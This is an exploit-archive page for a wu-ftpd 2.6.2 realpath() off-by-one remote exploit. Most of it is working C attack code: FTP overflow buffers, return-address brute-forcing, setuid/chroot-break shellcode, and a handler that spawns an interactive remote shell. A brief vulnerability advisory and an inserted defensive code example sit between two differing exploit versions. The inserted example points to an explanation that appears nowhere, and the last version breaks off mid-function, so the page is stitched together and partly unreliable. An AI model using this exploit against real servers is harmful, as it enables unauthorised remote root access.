	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD command failed.\n\n");
		exit(FAD);
	}
	return;
}

int send_shellcode(int sock,int type,char *dir_nm)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);
	
	for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(plat[t_g].shellcode);dr_n++)
	{
		dir_nm[dr_n]=(DEF_NOP);
	}
	for(cmd_f=(NRL);cmd_f<strlen(plat[t_g].shellcode);cmd_f++)
	{
		dir_nm[dr_n++]=plat[t_g].shellcode[cmd_f];
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,(GET_R)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
		exit(FAD);
	}
	return;
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
	char atk_bf[(GET_R)];
	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
			fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
			fprintf(stdout," [+] 02: make shell-code directory.\n");
			(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
			fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
			fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));	/* 04 */
			fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));	/* 05 */
			fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));	/* 06 */
			fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));	/* 07 */
			fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));	/* 08 */
			fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));	/* 09 */
			fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));	/* 10 */
			fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));	/* 11 */
			fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));	/* 12 */
			fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));	/* 13 */
			fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));	/* 14 */
			fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));	/* 15 */
			(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 16 */
			break;
		case 3:
		case 4:
		case 5:
		case 6:
		case 7:
		case 8:
			fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
			fprintf(stdout," [+] 02: make shell-code directory.\n");
			(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
			fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
			(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 04 */
			break;
	}
	if(type&&__exp_test)
	{
		__exp_test=(NRL);
		if(((int)check_exp(sock))==(FAD))
		{
			fprintf(stderr," [-] This isn't vulnerable.\n\n");
			exit(FAD);
		}
	}
	return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
	int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)atk_bf,(NRL),(GET_R));
	if(type) /* MKD command */
	{
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x4b);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
	else /* RMD command */
	{
		atk_bf[cmd_f++]=(0x52);
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
	for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(plat[t_g].off_st);r_rn_2++)
		atk_bf[r_rn_1++]=(0x41);
	{
		int chk_0xff=(NRL);
		switch(t_g)
		{
			case 0:
			case 1:
			case 2:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
			case 3:
			case 4:
			case 5:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				break;
			case 6:
			case 7:
			case 8:
				for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
				for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
					atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
		}
		*(long *)&atk_bf[r_rn_1]=0x41414141;
		r_rn_1+=(DEF_ALIGN);
		*(long *)&atk_bf[r_rn_1]=0x0d414141;
		r_rn_1+=(DEF_ALIGN);
		atk_bf[r_rn_1++]=(0x0a);
	}
	send(sock,atk_bf,strlen(atk_bf),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(type) /* MKD command */
	{
		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
	}
	else /* RMD command */
	{
		if(!strstr(get_nm,(CWD_COMM_SCS)))
		{
			fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
	}
	return;
}

int main(int argc,char *argv[])
{
	int opt_g,sock,__bf=(NRL);
	int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
	char user_id[(DEF_VA)]=(DEF_STR);
	char pass_wd[(DEF_VA)]=(DEF_STR);
	char tg_host[(DEF_VA)]=(DEF_HOST);
	int tg_port=(DEF_PORT);
	u_long sh_addr=(plat[t_g].sh_addr);

	(void)banrl();
	while((opt_g=getopt(argc,argv,"QqCcM:m:H:h:U:u:P:p:N:n:S:s:T:t:B:b:Ii"))!=EOF)
	{
		extern char *optarg;
		switch(opt_g)
		{
			case 'Q':
			case 'q':
				fprintf(stdout," [*] Banner scan mode.\n");
				b_scan=(SCS);
				break;
				
			case 'C':
			case 'c':
				fprintf(stdout," [*] Check exploit test mode.\n");
				__exp_test=(SCS);
				break;

			case 'M':
			case 'm':
				mx_bf=(atoi(optarg));
				bf_lsz=((0x1000)/mx_bf);
				break;

			case 'H':
			case 'h':
				memset((char *)tg_host,(NRL),sizeof(tg_host));
				strncpy(tg_host,optarg,sizeof(tg_host)-1);
				break;
				
			case 'U':
			case 'u':
				memset((char *)user_id,(NRL),sizeof(user_id));
				strncpy(user_id,optarg,sizeof(user_id)-1);
				break;
				
			case 'P':
			case 'p':
				memset((char *)pass_wd,(NRL),sizeof(pass_wd));
				strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
				break;
				
			case 'N':
			case 'n':
				tg_port=(atoi(optarg));
				break;
				
			case 'S':
			case 's':
				sh_addr=strtoul(optarg,(NRL),(NRL));
				break;
				
			case 'T':
			case 't':
				if((t_g=(atoi(optarg)))<(9))
					sh_addr=(plat[t_g].sh_addr);
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'B':
			case 'b':
				if((t_g=(atoi(optarg)))<(9))
				{
					sh_addr=(plat[t_g].bf_addr);
					__bf=(SCS);
				}
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'I':
			case 'i':
				(void)prcode_usage(argv[(NRL)]);
				break;
				
			case '?':
				(void)prcode_usage(argv[(NRL)]);
				break;
		}
	}
	if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
		(void)prcode_usage(argv[(NRL)]);
	
	memset((char *)home_dir,(NRL),sizeof(home_dir));
	snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(plat[t_g].home),user_id);

	if(!__bf)
	{
		fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
		sh_addr=(u_long)null_chk(sh_addr);
		fprintf(stdout," [+] address: %p.\n",sh_addr);
		fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [  OK  ]\n");

		fprintf(stdout," [1] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [2] send exploit code.\n");
		(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
		close(sock);

		fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [  OK  ]\n");

		fprintf(stdout," [3] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [4] send exploit code.\n");
		(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

		fprintf(stdout," [5] Waiting, execute the shell ");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);

		fprintf(stdout,".\n");
		(void)conn_shell(sock,sh_addr);
		close(sock);
	}
	else
	{
		int bt_num=(NRL);
		fprintf(stdout," [*] Brute-Force mode.\n");
		fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
		fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

		for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
		{
			sh_addr=(u_long)null_chk(sh_addr);
			fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
			fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [  OK  ]\n");
			
			fprintf(stdout," [1] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [2] send exploit code.\n");
			if(bt_num==(NRL))
			{
				(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
			}
			else
			{
				(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
			}
			close(sock);
			
			fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [  OK  ]\n");
			
			fprintf(stdout," [3] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [4] send exploit code.\n");
			(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
			
			fprintf(stdout," [5] Waiting, execute the shell ");
			fflush(stdout);
			(u_int)sleep(SCS);

			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".\n");
			(void)conn_shell(sock,sh_addr);
			close(sock);

			sh_addr+=(bf_lsz);
		}
	}
	exit(NRL);
}

int setsock(char *u_host,int u_port)
{
	int sock;
	struct hostent *sxp;
	struct sockaddr_in sxp_addr;
 
	if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
	{
		return(FAD);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
	{
		return(FAD);
	}
	sxp_addr.sin_family=AF_INET;
	sxp_addr.sin_port=htons(u_port);
	sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
	bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

	if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
	{
		return(FAD);
	}
	return(sock);
}

void conn_shell(int conn_sock,u_long scs_addr)
{
	int died;
	int ex_t=(NRL);
	char *command,readbuf[(GET_R)];
	fd_set rset;

	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
		case 3:
		case 4:
		case 5:
			command=(DEF_COMM);
			break;
		case 6:
		case 7:
		case 8:
			command=(DEF_COMM_OB);
			break;
	}
	memset((char *)readbuf,(NRL),sizeof(readbuf));
	fprintf(stdout," [*] Send, command packet !\n\n");
	send(conn_sock,command,strlen(command),(NRL));

	for(;;)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(conn_sock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(conn_sock+1,&rset,NULL,NULL,NULL);

		if(FD_ISSET(conn_sock,&rset))
		{
			died=read(conn_sock,readbuf,sizeof(readbuf)-1);
			if(died<=(NRL))
			{
				if(!ex_t)
				{
					fprintf(stderr," [-] exploit failure.\n\n");
					return;
				}
				else
				{
		fprintf(stdout," [*] exploit successfully ! (&shellcode_addr: %p)\n\n",scs_addr);
					exit(NRL);
				}
			}
			readbuf[died]=(NRL);
			fprintf(stdout,"%s",readbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
			if(died>(NRL))
			{
				readbuf[died]=(NRL);
				if(strstr(readbuf,"exit"))
					ex_t=(SCS);
				write(conn_sock,readbuf,died);
			}
		}
	}
	return;
}

void re_connt(int st_sock_va)
{
	if(st_sock_va==(FAD))
	{
		fprintf(stdout," [ Fail ]\n\n");
		exit(FAD);
	}
}

void banrl()
{
	fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

int check_exp(int sock)
{
	int conn_died;
	char gt_bf[(GET_R)];

	fprintf(stdout,"\n [+] Check exploit test ...\n");
	send(sock,"X82\r\n",strlen("X82\r\n"),(NRL)); /* test packet */
	(u_int)sleep(SCS);
	memset((char *)gt_bf,(NRL),sizeof(gt_bf));
	conn_died=read(sock,gt_bf,sizeof(gt_bf)-1);

	if(strstr(gt_bf,(CMD_ERROR)))
	{
		fprintf(stdout," [X] After test exploit, wu-ftpd is alive.\n");
		return(FAD);
	}
	else if(conn_died<=(NRL))
	{
		fprintf(stdout," [*] Ok, This is vulnerable version.\n\n");
		return(SCS);
	}
	else return(FAD);
}

/* eoc */

// milw0rm.com [2003-08-11]
		

- Vulnerability information (22974)

wu-ftpd 2.6.2 realpath() Off-By-One Buffer Overflow Vulnerability (EDBID:22974)
unix remote
2003-08-02 Verified
0 Xpl017Elz
N/A
source: http://www.securityfocus.com/bid/8315/info

The 'realpath()' function is a C-library procedure that resolves the canonical, absolute pathname of a file from a path that may contain components such as '/', './', '../', or symbolic links. A vulnerability reported to affect the implementation of 'realpath()' in WU-FTPD has led to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack-buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.

Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions. 

NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.
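The 1024-byte, two-separator case described above comes down to a length check that does not budget for every byte the final join will write: the separator added before the last component is left out, so a result that exactly fills MAXPATHLEN bytes still gets its terminating NUL written one byte past the buffer. The following is an added example, not the wu-ftpd, FreeBSD libc or iSEC code: a constructed C model of that class of bug beside the corrected check and a hardened join routine. MAXPATHLEN is 1024 as the page states; the function names, the `rootd` flag (set when the already-resolved directory is exactly "/") and the 1000/23-byte boundary values are assumptions chosen for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Constructed model (assumption, not the real realpath source) of the
 * advisory's off-by-one. A resolved directory sits in a MAXPATHLEN
 * buffer and the last path component is appended; unless the directory
 * is "/" (rootd == 1), a "/" separator is written first. */
#define MAXPATHLEN 1024

/* Vulnerable-style check: it budgets rootd + 1 bytes, so the separator
 * written when rootd == 0 is never counted. Returns 1 when the check
 * would let the copy proceed. */
int join_check_vulnerable(size_t resolved_len, size_t comp_len, int rootd)
{
    return resolved_len + comp_len + rootd + 1 <= MAXPATHLEN;
}

/* Corrected check: count the separator exactly when one will be
 * written, plus the terminating NUL. */
int join_check_fixed(size_t resolved_len, size_t comp_len, int rootd)
{
    size_t sep = rootd ? 0 : 1;
    return resolved_len + sep + comp_len + 1 <= MAXPATHLEN;
}

/* Bytes the join actually writes into the buffer, NUL included. */
size_t join_bytes_written(size_t resolved_len, size_t comp_len, int rootd)
{
    return resolved_len + (rootd ? 0 : 1) + comp_len + 1;
}

/* 1 when the vulnerable check accepts a join that writes past
 * MAXPATHLEN: the single-NUL-byte overflow the advisory describes. */
int vulnerable_overflows(size_t resolved_len, size_t comp_len, int rootd)
{
    return join_check_vulnerable(resolved_len, comp_len, rootd)
        && join_bytes_written(resolved_len, comp_len, rootd) > MAXPATHLEN;
}

/* Hardened join over a real buffer: every byte is budgeted before
 * anything is written, and an over-long result is refused with
 * ENAMETOOLONG, leaving the buffer untouched. */
int join_path_safe(char *resolved, size_t size, const char *comp)
{
    size_t rlen = strlen(resolved);
    size_t clen = strlen(comp);
    int rootd = (rlen == 1 && resolved[0] == '/');
    size_t need = rlen + (rootd ? 0 : 1) + clen + 1;

    if (need > size) {
        errno = ENAMETOOLONG;
        return -1;
    }
    if (!rootd)
        resolved[rlen++] = '/';
    memcpy(resolved + rlen, comp, clen + 1); /* copies the NUL as well */
    return 0;
}

int main(void)
{
    /* Boundary: directory + component = MAXPATHLEN - 1 bytes, rootd == 0.
     * The vulnerable check passes, yet the join writes MAXPATHLEN + 1 bytes. */
    size_t r = 1000, c = 23;
    char buf[MAXPATHLEN] = "/usr";

    printf("vulnerable check: %s, bytes written: %zu, fixed check: %s\n",
           join_check_vulnerable(r, c, 0) ? "pass" : "reject",
           join_bytes_written(r, c, 0),
           join_check_fixed(r, c, 0) ? "pass" : "reject");

    if (join_path_safe(buf, sizeof buf, "home") == 0)
        printf("joined: %s\n", buf);
    return 0;
}
```

The point for a reviewer or auditor is the shape of the check, not the constants: any length test that adds a fixed "+ 1" must account for every byte the subsequent copy emits, including separators that are only sometimes written. The same reasoning applies to the NOTE above: a program that carries its own copy of such a join (as wu-ftpd did with fb_realpath()) is not fixed by a libc patch and must be audited and rebuilt on its own.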

/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** Public version - 2003/08/02
**
** --
** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
** Janusz Niewiadomski <funkysh@isec.pl>.
** They offered excellent Advisory, I'm thankful to them.
**
** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** More useful version isn't going to share. (various test version)
** For reference, exploit method that use `STOR' command succeeded. :-)
**
** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
**         August 3, Brute-Force function addition.
** --
** Thank you.
**
*/

#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();

struct os
{
        int num;
        char *v_nm;
        u_long sh_addr;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char shellcode_ffx2[]=
        /* setuid/chroot-break/execve shellcode by Lam3rZ */
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
        "\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
        "\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
        "\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
        "\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
        "\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
        "\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
        "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
        "\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
        "\x2e\x2e\x31\x31";

struct os plat[]=
{
        /*
        ** I enjoy version up, will not share more. :-}
        */
        {
                0,"RedHat Linux 6.x Version wu-2.6.0(1) compile",0x0806a59c
        },
        {
                1,"RedHat Linux 6.x Version wu-2.6.1(1) compile",0x0806aad8
        },
        {
                2,"RedHat Linux 6.x Version wu-2.6.2(2) compile",0x0806aa60
        },
        {
                0x82,NULL,0x0
        },
        {
                0x8282,"Brute-Force mode",0x0806a082
        }
};

void prcode_usage(char *f_nm)
{
        int r_n=(NRL);
        fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
        fprintf(stdout," \t-h [hostname]   : Target hostname & ip.\n");
        fprintf(stdout," \t-u [userid]     : User id.\n");
        fprintf(stdout," \t-p [passwd]     : User password.\n");
        fprintf(stdout," \t-n [port num]   : Target port number.\n");
        fprintf(stdout," \t-s [shelladdr]  : Shellcode address.\n");
        fprintf(stdout," \t-b              : Brute-Force mode.\n");
        fprintf(stdout," \t-m [max num]    : Brute-Force Count number.\n");
        fprintf(stdout," \t-i              : help information.\n");
        fprintf(stdout," \t-t [target num] : Select target number.\n\n");
        for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
        {
                fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
        }
        fprintf(stdout,"\n Example: %s -hlocalhost -ux82 -px82 -n21 -t0\n\n",f_nm);
        exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
        if((sh_addr>>(NRL)&0xff)==(0x00))
        {
                return(sh_addr+=(SCS));
        }
        else return(sh_addr);
}

void ftpd_login(int sock,char *user,char *pass)
{
        char send_recv[(GET_R)];

        (u_int)sleep(SCS);
        memset((char *)send_recv,(NRL),sizeof(send_recv));
        recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

        if(!strstr(send_recv,(FTP_CONN_SCS)))
        {
                fprintf(stdout," [-] ftpd connection failure.\n\n");
                close(sock);
                exit(FAD);
        }
        else fprintf(stdout," [*] ftpd connection success.\n");
        fprintf(stdout," [+] User id input.\n");

        memset((char *)send_recv,(NRL),sizeof(send_recv));
        snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
        send(sock,send_recv,strlen(send_recv),(NRL));

        (u_int)sleep(SCS);
        memset((char *)send_recv,(NRL),sizeof(send_recv));
        recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

        if(!strstr(send_recv,(FTP_USER_FAD)))
        {
                fprintf(stdout," [-] User id input failure.\n\n");
                close(sock);
                exit(FAD);
        }
        else fprintf(stdout," [+] User password input.\n");

        memset((char *)send_recv,(NRL),sizeof(send_recv));
        snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
        send(sock,send_recv,strlen(send_recv),(NRL));

        (u_int)sleep(SCS);
        memset((char *)send_recv,(NRL),sizeof(send_recv));
        recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

        if(strstr(send_recv,(FTP_LOGIN_FAD)))
        {
                fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
                close(sock);
                exit(FAD);
        }
        else if(strstr(send_recv,(FTP_LOGIN_SCS)))
        {
                fprintf(stdout," [*] User %s logged in.\n",user);
        }
        else
        {
                fprintf(stdout," [-] ftpd handshake failure.\n\n");
                close(sock);
                exit(FAD);
        }
        return;
}

int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
        int dr_n=(NRL),cmd_f=(NRL);
        char get_nm[(GET_R)];

        memset((char *)dir_nm,(NRL),(GET_R));
        /* MKD command */
        dir_nm[cmd_f++]=(0x4d);
        dir_nm[cmd_f++]=(0x4b);
        dir_nm[cmd_f++]=(0x44);
        dir_nm[cmd_f++]=(0x20);

        for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
        {
                dir_nm[dr_n]=(gb_character);
        }
        dir_nm[dr_n++]=(0x0d);
        dir_nm[dr_n++]=(0x0a);

        if(type)
        {
                send(sock,dir_nm,strlen(dir_nm),(NRL));
                (u_int)sleep(SCS);
                memset((char *)get_nm,(NRL),sizeof(get_nm));
                recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

                if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
                {
                        fprintf(stdout," [-] MKD command failed.\n\n");
                        exit(FAD);
                }
        }
        /* CMD command */
        cmd_f=(NRL);
